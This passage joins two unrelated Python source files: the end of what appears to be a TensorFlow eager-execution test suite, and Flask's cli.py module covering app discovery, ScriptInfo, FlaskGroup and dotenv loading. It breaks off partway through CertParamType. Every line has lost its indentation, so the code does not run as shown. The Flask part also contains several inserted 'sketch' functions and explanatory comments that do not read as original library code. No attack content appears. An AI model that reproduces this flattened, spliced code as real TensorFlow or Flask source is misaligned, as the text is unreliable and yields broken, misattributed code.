inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))
context.async_wait()
context.async_clear_error()
context.context().execution_mode = context.SYNC
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEquals(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
configure_virtual_cpus()
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = constant_op.constant(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertEqual(cache.get('1'), None)
cache.put('2', array_ops.zeros((2)))
self.assertNotEqual(cache.get('2'), None)
if __name__ == '__main__':
test.main()
|
cli.py
|
import ast
import inspect
import os
import platform
import re
import sys
import traceback
import warnings
from functools import update_wrapper
from operator import attrgetter
from threading import Lock
from threading import Thread
import click
from werkzeug.utils import import_string
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_env
from .helpers import get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
try:
import ssl
except ImportError:
ssl = None # type: ignore
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in module.__dict__.values() if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
"Detected multiple Flask applications in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
f" to specify the correct one."
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError as e:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
f"Detected factory {attr_name!r} in module {module.__name__!r},"
" but could not call it without arguments. Use"
f" \"FLASK_APP='{module.__name__}:{attr_name}(args)'\""
" to specify arguments."
) from e
raise NoAppException(
"Failed to find Flask application or factory in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
" to specify one."
)
def call_factory(script_info, app_factory, args=None, kwargs=None):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
sig = inspect.signature(app_factory)
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
if "script_info" in sig.parameters:
warnings.warn(
"The 'script_info' argument is deprecated and will not be"
" passed to the app factory function in Flask 2.1.",
DeprecationWarning,
)
kwargs["script_info"] = script_info
if not args and len(sig.parameters) == 1:
first_parameter = next(iter(sig.parameters.values()))
if (
first_parameter.default is inspect.Parameter.empty
# **kwargs is reported as an empty default, ignore it
and first_parameter.kind is not inspect.Parameter.VAR_KEYWORD
):
warnings.warn(
"Script info is deprecated and will not be passed as the"
" single argument to the app factory function in Flask"
" 2.1.",
DeprecationWarning,
)
args.append(script_info)
return app_factory(*args, **kwargs)
def _called_with_wrong_args(f):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param f: The function that was called.
:return: ``True`` if the call failed.
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is f.__code__:
# In the function, it was called successfully.
return False
tb = tb.tb_next
# Didn't reach the function.
return True
finally:
# Delete tb to break a circular reference.
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(script_info, module, app_name):
"""Check if the given string is a variable name or a function. Call
a function to get the app instance, or return the variable directly.
"""
from . import Flask
# Parse app_name as a single expression to determine if it's a valid
# attribute name or function call.
try:
expr = ast.parse(app_name.strip(), mode="eval").body
except SyntaxError:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
) from None
if isinstance(expr, ast.Name):
name = expr.id
args = kwargs = None
elif isinstance(expr, ast.Call):
# Ensure the function name is an attribute name only.
if not isinstance(expr.func, ast.Name):
raise NoAppException(
f"Function reference must be a simple name: {app_name!r}."
)
name = expr.func.id
# Parse the positional and keyword arguments as literals.
try:
args = [ast.literal_eval(arg) for arg in expr.args]
kwargs = {kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords}
except ValueError:
# literal_eval gives cryptic error messages, show a generic
# message with the full expression instead.
raise NoAppException(
f"Failed to parse arguments as literal values: {app_name!r}."
) from None
else:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(
f"Failed to find attribute {name!r} in {module.__name__!r}."
) from e
# If the attribute is a function, call it with any args and kwargs
# to get the real application.
if inspect.isfunction(attr):
try:
app = call_factory(script_info, attr, args, kwargs)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
f"The factory {app_name!r} in module"
f" {module.__name__!r} could not be called with the"
" specified arguments."
) from e
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from"
f" '{module.__name__}:{app_name}'."
)
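# Illustrative FLASK_APP values that find_app_by_string() above accepts (the
# module and factory names are hypothetical):
#
#   FLASK_APP="hello:app"                -> plain attribute lookup
#   FLASK_APP="hello:create_app"         -> factory called with no arguments
#   FLASK_APP="hello:create_app('dev')"  -> factory called with literal arguments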
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True # noqa: F841
try:
__import__(module_name)
except ImportError as e:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[2].tb_next:
raise NoAppException(
f"While importing {module_name!r}, an ImportError was raised."
) from e
elif raise_if_not_found:
raise NoAppException(f"Could not import {module_name!r}.") from e
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
import werkzeug
from . import __version__
click.echo(
f"Python {platform.python_version()}\n"
f"Flask {__version__}\n"
f"Werkzeug {werkzeug.__version__}",
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp:
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=None):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc = None
if use_eager_loading is None:
use_eager_loading = os.environ.get("WERKZEUG_RUN_MAIN") != "true"
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True # noqa: F841
with self._lock:
try:
self._load_unlocked()
except Exception as e:
self._bg_loading_exc = e
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True # noqa: F841
exc = self._bg_loading_exc
if exc is not None:
self._bg_loading_exc = None
raise exc
def _load_unlocked(self):
__traceback_hide__ = True # noqa: F841
self._app = rv = self.loader()
self._bg_loading_exc = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True # noqa: F841
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo:
"""Helper object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True # noqa: F841
if self._loaded_app is not None:
return self._loaded_app
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(self, import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
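# A minimal sketch (the import path is illustrative) of how ScriptInfo and
# DispatchingApp combine: ScriptInfo resolves and caches the Flask app lazily,
# while DispatchingApp lets a WSGI server start before the import has finished.
def _load_app_sketch():
    info = ScriptInfo(app_import_path="wsgi:app")  # hypothetical FLASK_APP value
    return DispatchingApp(info.load_app, use_eager_loading=True)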
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
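# A minimal sketch of a custom command wrapped by with_appcontext() above, so
# that its body runs inside an application context; the command name and body
# are illustrative only.
@click.command("app-name")
@with_appcontext
def _app_name_command_sketch():
    click.echo(current_app.name)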
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this. See :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
set_debug_flag=True,
**extra,
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# Look up built-in and plugin commands, which should be
# available even if the app fails to load.
rv = super().get_command(ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
# Look up commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
return info.load_app().cli.get_command(ctx, name)
except NoAppException as e:
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
def list_commands(self, ctx):
self._load_plugin_commands()
# Start with the built-in and plugin commands.
rv = set(super().list_commands(ctx))
info = ctx.ensure_object(ScriptInfo)
# Add commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
rv.update(info.load_app().cli.list_commands(ctx))
except NoAppException as e:
# When an app couldn't be loaded, show the error message
# without the traceback.
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
except Exception:
# When any other errors occurred during loading, show the
# full traceback.
click.secho(f"{traceback.format_exc()}\n", err=True, fg="red")
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(
create_app=self.create_app, set_debug_flag=self.set_debug_flag
)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super().main(*args, **kwargs)
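# A minimal sketch of the "custom scripts" use case mentioned in the
# FlaskGroup docstring (the factory name create_app is a hypothetical example):
#
#     import click
#     from flask import Flask
#     from flask.cli import FlaskGroup
#
#     def create_app():
#         return Flask("example")
#
#     @click.group(cls=FlaskGroup, create_app=create_app)
#     def cli():
#         """Management script for the example application."""
#
#     if __name__ == "__main__":
#         cli()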
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
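# Worked example (POSIX separators assumed):
#     _path_is_ancestor("/srv/app", "/srv/app/static")
#         -> os.path.join("/srv/app", "static") == "/srv/app/static"   -> True
#     _path_is_ancestor("/srv/app", "/srv/application")
#         -> os.path.join("/srv/app", "lication") != "/srv/application" -> False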
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionchanged:: 1.1.0
Returns ``False`` when python-dotenv is not installed, or when
the given path isn't a file.
.. versionchanged:: 2.0
When loading the env files, set the default encoding to UTF-8.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env or .flaskenv files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
err=True,
)
return False
# If an explicit path was given, load that file if it exists;
# otherwise return False.
if path is not None:
if os.path.isfile(path):
return dotenv.load_dotenv(path, encoding="utf-8")
return False
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path, encoding="utf-8")
return new_dir is not None # at least one file was located and loaded
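# A minimal sketch of the files this function looks for (contents are
# hypothetical): a ".flaskenv" next to the project could contain
#
#     FLASK_APP=hello.py
#     FLASK_ENV=development
#
# and load_dotenv() would export both variables unless they are already set,
# since ".env" is searched first and existing values are never overwritten.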
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = f" * Serving Flask app {app_import_path!r}"
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(f" * Environment: {env}")
if env == "production":
click.secho(
" WARNING: This is a development server. Do not use it in"
" a production deployment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(f" * Debug mode: {'on' if debug else 'off'}")
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
if ssl is None:
raise click.BadParameter(
'Using "--cert" requires Python to be compiled with SSL support.',
ctx,
param,
)
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
